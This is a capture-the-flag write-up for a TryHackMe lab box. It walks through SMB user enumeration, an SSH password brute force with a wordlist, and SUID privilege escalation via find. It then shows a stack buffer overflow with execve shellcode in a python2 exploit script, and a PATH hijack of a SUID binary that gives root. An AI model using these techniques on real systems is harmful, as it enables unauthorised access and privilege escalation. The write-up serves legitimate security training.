Let’s go:
╭─ ~
╰─❯ nmap -sC -sV 10.10.208.81 -v -p-
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-06 11:47 MSK
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3f:36:de:da:2f:c3:b7:78:6f:a9:25:d6:41:dd:54:69 (RSA)
| 256 d0:78:23:ee:f3:71:58:ae:e9:57:14:17:bb:e3:6a:ae (ECDSA)
|_ 256 4c:de:f1:49:df:21:4f:32:ca:e6:8e:bc:6a:96:53:e5 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: THM_EXPLOIT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: THM_EXPLOIT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: thm_exploit
| NetBIOS computer name: THM_EXPLOIT\x00
| Domain name: \x00
| FQDN: thm_exploit
|_ System time: 2024-03-06T08:48:18+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-03-06T08:48:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.76 secondsSo we only have smb.
╭─ ~ ✘ INT
╰─❯ smbclient -L 10.10.208.81
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\ch]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (THM_exploit server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available╭─ ~ ✘ INT
╰─❯ enum4linux -a 10.10.208.81
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 6 11:50:30 2024
...
================================( Nbtstat Information for 10.10.208.81 )================================
Can't load /etc/samba/smb.conf - run testparm to debug it
Looking up status of 10.10.208.81
THM_EXPLOIT <00> - B <ACTIVE> Workstation Service
THM_EXPLOIT <03> - B <ACTIVE> Messenger Service
THM_EXPLOIT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
...
============================( Password Policy Information for 10.10.208.81 )============================
[+] Attaching to 10.10.208.81 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] THM_EXPLOIT
[+] Builtin
[+] Password Info for Domain: THM_EXPLOIT
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
...
==================( Users on 10.10.208.81 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kel (Local User)
S-1-22-1-1001 Unix User\des (Local User)
S-1-22-1-1002 Unix User\<REDACTED> (Local User)
S-1-22-1-1003 Unix User\noentry (Local User)
[+] Enumerating users using SID S-1-5-21-2007993849-1719925537-2372789573 and logon username '', password ''
S-1-5-21-2007993849-1719925537-2372789573-501 THM_EXPLOIT\nobody (Local User)
S-1-5-21-2007993849-1719925537-2372789573-513 THM_EXPLOIT\None (Domain Group)Only interesting thing I see is users.
Looking into hint on THM
Hint 1: RID range 1000-1003 Hint 2: The longest username has the unsecure password.
We know that one of the users we found has insecure password. Let’s brute it.
╭─ ~ ✘ INT
╰─❯ patator ssh_login host=10.10.208.81 user=<REDACTED> password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep='failed'
/usr/sbin/patator:2658: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
from telnetlib import Telnet
12:13:29 patator INFO - Starting Patator 1.1-dev (https://github.com/lanjelot/patator) with python-3.11.7 at 2024-03-06 12:13 MSK
12:13:29 patator INFO -
12:13:29 patator INFO - code size time | candidate | num | mesg
12:13:29 patator INFO - -----------------------------------------------------------------------------
12:16:44 patator INFO - 0 39 0.254 | <REDACTED> | 845 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3Then just connect thru ssh:
<REDACTED>@THM_exploit:/$ find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/home/des/bof
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/find
/usr/bin/chsh
/usr/bin/at
/usr/bin/pkexec
/usr/bin/newgrp
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
/bin/pingThe most interesting SUID binaries are
/home/des/bofand /usr/bin/find
And the next question is “What is the contents of /home/des/flag.txt”
Let’s use find binary to privesc.
Looking thru gtfobins page for find
We see ./find . -exec /bin/sh -p \; -quit
Let’s try that!
<REDACTED>@THM_exploit:/$ id
uid=1002(<REDACTED>) gid=1002(<REDACTED>) groups=1002(<REDACTED>)
<REDACTED>@THM_exploit:/$ find . -exec /bin/bash -p \; -quit
bash-4.4$ id
uid=1002(<REDACTED>) gid=1002(<REDACTED>) euid=1001(des) egid=1001(des) groups=1001(des),1002(<REDACTED>)
bash-4.4$ cd /home/des
bash-4.4$ ls -la
total 52
drwx------ 4 des des 4096 Jan 17 2020 .
drwxr-xr-x 6 root root 4096 Jan 17 2020 ..
-rw------- 1 root root 1740 Jan 12 2020 .bash_history
-rw-r--r-- 1 des des 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 des des 3771 Apr 4 2018 .bashrc
-rwsr-xr-x 1 kel kel 8600 Jan 17 2020 bof
-rw-r--r-- 1 root root 335 Jan 17 2020 bof64.c
drwx------ 2 des des 4096 Jan 12 2020 .cache
-r-x------ 1 des des 237 Jan 17 2020 flag.txt
drwx------ 3 des des 4096 Jan 12 2020 .gnupg
-rw-r--r-- 1 des des 807 Apr 4 2018 .profile
bash-4.4$ cat flag.txt
Good job on exploiting the SUID file. Never assign +s to any system executable files. Remember, Check gtfobins.
You flag is THM{REDACTED}
login crdential (In case you need it)
username: des
password: <REDACTED>
bash-4.4$Now let’s ssh as des for better connection.
We should read /home/kel/flag.txt
To do so I assume we will use binary /home/des/bof
Let’s read source using cat bof64.c
\#include <stdio.h>
\#include <unistd.h>
int foo(){
char buffer[600];
int characters_read;
printf("Enter some string:\n");
characters_read = read(0, buffer, 1000);
printf("You entered: %s", buffer);
return 0;
}
void main(){
setresuid(geteuid(), geteuid(), geteuid());
setresgid(getegid(), getegid(), getegid());
foo();
}Pretty easy exploitable binary.
Let’s download it to host and exploit locally first.
So on target we run python3 -m http.server
And on host
wget http://10.10.208.81:8000/bof
wget http://10.10.208.81:8000/bof64.c
chmod +x bofI will use gdb-pwndbg for debugging.
(If you are not familiar with gdb scripts I really recommend you to use this)
pwndbg> file bof
pwndbg> cyclic 500
pwndbg> runAnd paste cyclic output into it.
Program received signal SIGSEGV, Segmentation fault.
0x000055555540084e in foo ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────
RAX 0x0
*RBX 0x3d8
RCX 0x0
RDX 0x0
*RDI 0x7fffffffd830 —▸ 0x7fffffffd860 ◂— 0x61616e6361616161 ('aaaacnaa')
*RSI 0x7fffffffd860 ◂— 0x61616e6361616161 ('aaaacnaa')
*R8 0x73
*R9 0x1
R10 0x0
*R11 0x246
*R12 0x3d8
*R13 0x7fffffffddb8 ◂— 0x6561616161616172 ('raaaaaae')
*R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555400000 ◂— jg 0x555555400047
R15 0x0
*RBP 0x6461616161616162 ('baaaaaad')
*RSP 0x7fffffffdc78 ◂— 0x6461616161616163 ('caaaaaad')
*RIP 0x55555540084e (foo+84) ◂— ret
──────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────
► 0x55555540084e <foo+84> ret <0x6461616161616163>Now we can just use cyclic again to find offset.
pwndbg> cyclic -l $rbp
Finding cyclic pattern of 8 bytes: b'baaaaaad' (hex: 0x6261616161616164)
Found at offset 608
pwndbg> cyclic -l caaaaaad
Finding cyclic pattern of 8 bytes: b'caaaaaad' (hex: 0x6361616161616164)
Found at offset 616Now we know that offset to rbp is 608
Let’s check do we have control usingpwndbg> run <<(python2 -c 'print "A"*608 + "testing1"')
Program received signal SIGSEGV, Segmentation fault.
0x000055555540080a in foo ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────
*RAX 0x0
RBX 0x3d8
*RCX 0x0
*RDX 0x0
*RDI 0x7fffffffd830 —▸ 0x7fffffffd860 ◂— 0x4141414141414141 ('AAAAAAAA')
*RSI 0x7fffffffd860 ◂— 0x4141414141414141 ('AAAAAAAA')
*R8 0x73
R9 0x1
*R10 0x0
R11 0x246
R12 0x3d8
*R13 0x7fffffffddb8 —▸ 0x7fffffffe070 ◂— 'SHELL=/usr/bin/zsh'
R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555400000 ◂— jg 0x555555400047
R15 0x0
*RBP 0x31676e6974736574 ('testing1')
*RSP 0x7fffffffdc80 —▸ 0x7fffffffdda8 —▸ 0x7fffffffe055 ◂— '/home/ch/ctf/thm/binex/bof'
*RIP 0x55555540080a (foo+16) ◂— add byte ptr [rax], alWe see that rbp is our string now.
Let’s check stack and find address where we can return later
To do so we need to run gdb on target.
(gdb) x/200x $rsp-700
0x7fffffffe1dc: 0x00007fff 0x00000012 0x00000000 0xf7dd0760
0x7fffffffe1ec: 0x00007fff 0x55554934 0x00005555 0xf7a64b62
0x7fffffffe1fc: 0x00007fff 0xf79e90e8 0x00007fff 0x000003e9
0x7fffffffe20c: 0x00000000 0xffffe490 0x00007fff 0x000003e9
0x7fffffffe21c: 0x00000000 0xffffe590 0x00007fff 0x55554848
0x7fffffffe22c: 0x00005555 0x61616161 0x61616161 0x61616162
0x7fffffffe23c: 0x61616161 0x61616163 0x61616161 0x61616164
0x7fffffffe24c: 0x61616161 0x61616165 0x61616161 0x61616166
0x7fffffffe25c: 0x61616161 0x61616167 0x61616161 0x61616168
0x7fffffffe26c: 0x61616161 0x61616169 0x61616161 0x6161616a
0x7fffffffe27c: 0x61616161 0x6161616b 0x61616161 0x6161616c
0x7fffffffe28c: 0x61616161 0x6161616d 0x61616161 0x6161616e
0x7fffffffe29c: 0x61616161 0x6161616f 0x61616161 0x61616170
0x7fffffffe2ac: 0x61616161 0x61616171 0x61616161 0x61616172
0x7fffffffe2bc: 0x61616161 0x61616173 0x61616161 0x61616174
0x7fffffffe2cc: 0x61616161 0x61616175 0x61616161 0x61616176
0x7fffffffe2dc: 0x61616161 0x61616177 0x61616161 0x61616178
0x7fffffffe2ec: 0x61616161 0x61616179 0x61616161 0x6161617a
0x7fffffffe2fc: 0x62616161 0x61616162 0x62616161 0x61616163
0x7fffffffe30c: 0x62616161 0x61616164 0x62616161 0x61616165
0x7fffffffe31c: 0x62616161 0x61616166 0x62616161 0x61616167
0x7fffffffe32c: 0x62616161 0x61616168 0x62616161 0x61616169
0x7fffffffe33c: 0x62616161 0x6161616a 0x62616161 0x6161616b
0x7fffffffe34c: 0x62616161 0x6161616c 0x62616161 0x6161616d
0x7fffffffe35c: 0x62616161 0x6161616e 0x62616161 0x6161616f
0x7fffffffe36c: 0x62616161 0x61616170 0x62616161 0x61616171
0x7fffffffe37c: 0x62616161 0x61616172 0x62616161 0x61616173
0x7fffffffe38c: 0x62616161 0x61616174 0x62616161 0x61616175
0x7fffffffe39c: 0x62616161 0x61616176 0x62616161 0x61616177
0x7fffffffe3ac: 0x62616161 0x61616178 0x62616161 0x61616179
0x7fffffffe3bc: 0x62616161 0x6161617a 0x63616161 0x61616162
0x7fffffffe3cc: 0x63616161 0x61616163 0x63616161 0x61616164
0x7fffffffe3dc: 0x63616161 0x61616165 0x63616161 0x61616166
0x7fffffffe3ec: 0x63616161 0x61616167 0x63616161 0x61616168
0x7fffffffe3fc: 0x63616161 0x61616169 0x63616161 0x6161616a
0x7fffffffe40c: 0x63616161 0x6161616b 0x63616161 0x6161616c
0x7fffffffe41c: 0x63616161 0x6161616d 0x63616161 0x6161616e
0x7fffffffe42c: 0x63616161 0x6161616f 0x63616161 0x61616170
0x7fffffffe43c: 0x63616161 0x61616171 0x63616161 0x61616172
0x7fffffffe44c: 0x63616161 0x61616173 0x63616161 0x61616174
0x7fffffffe45c: 0x63616161 0x61616175 0x63616161 0x61616176
0x7fffffffe46c: 0x63616161 0x61616177 0x63616161 0x61616178
0x7fffffffe47c: 0x63616161 0x61616179 0x63616161 0x6161617a
0x7fffffffe48c: 0x000003e8 0x61616162 0x64616161 0x61616163
0x7fffffffe49c: 0x64616161 0x61616164 0x64616161 0x61616165
0x7fffffffe4ac: 0x64616161 0x61616166 0x64616161 0x61616167
0x7fffffffe4bc: 0x64616161 0x61616168 0x64616161 0x61616169
0x7fffffffe4cc: 0x64616161 0x6161616a 0x64616161 0x6161616b
0x7fffffffe4dc: 0x64616161 0x6161616c 0x64616161 0x6161616d
0x7fffffffe4ec: 0x64616161 0x6161616e 0x64616161 0x6161616f
...For example let’s choose 0x7fffffffe33c
Let’s use shellcode from hint.
We create such python2 script:
from struct import pack
nop = "\x90"
payload = nop * 400
payload += "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
payload += "A" * (216 - len(buf))
payload += pack("<Q", 0x7fffffffe33c)
print payloadWe use 616 and not 608 since we need to overwrite RSP and not RBP. (it’s always 8 more from rbp)
400 syms of our offset are nops and other 216 are shellcode and A syms. After that 8 syms to reach RSP, and return address that is now will be in pointer cause of offset.
now let’s run it and see …
python -m http.server
On target:
wget http://10.14.72.171:8000/ex.py
python2 ex.py > payl
(cat payl; cat) | ./bofAnd
id
uid=1000(kel) gid=1001(des) groups=1001(des)
cd /home/kel
ls -la
total 52
drwx------ 4 kel kel 4096 Jan 17 2020 .
drwxr-xr-x 6 root root 4096 Jan 17 2020 ..
-rw------- 1 root root 16 Jan 12 2020 .bash_history
-rw-r--r-- 1 kel kel 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 kel kel 3771 Apr 4 2018 .bashrc
drwx------ 2 kel kel 4096 Jan 12 2020 .cache
drwx------ 3 kel kel 4096 Jan 12 2020 .gnupg
-rw-r--r-- 1 kel kel 807 Apr 4 2018 .profile
-rwsr-xr-x 1 root root 8392 Jan 17 2020 exe
-rw-r--r-- 1 root root 76 Jan 17 2020 exe.c
-rw------- 1 kel kel 118 Jan 17 2020 flag.txt
cat flag.txt
You flag is THM{<REDACTED>}
The user credential
username: kel
password: <REDACTED>Now we can just ssh into kel
We already remember that /home/kel/exe is SUID binary from ls -la before ssh
Let’s check source code for it (cat exe.c)
\#include <unistd.h>
void main()
{
setuid(0);
setgid(0);
system("ps");
}Oh, very easy to hack. We just should create ps executable in PATH.
export PATH=`pwd`:$PATH
cp /bin/sh ./ps
./exe
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),1000(kel)
# ls -la /root
total 36
drwx------ 4 root root 4096 Jan 17 2020 .
drwxr-xr-x 26 root root 4096 Jan 12 2020 ..
-rw------- 1 root root 7562 Jan 17 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4096 Jan 12 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 128 Jan 17 2020 root.txt
drwx------ 2 root root 4096 Jan 12 2020 .ssh
# cat /root/root.txt
The flag: THM{<REDACTED>}.
Also, thank you for your participation.
The room is built with love. DesKel out.
#I really struggled with buffer overflow since first i tried pwntools and running executable at port but it was unnecessary. Also I forgot about return address first and was trying to get working exploit for more than 2 hours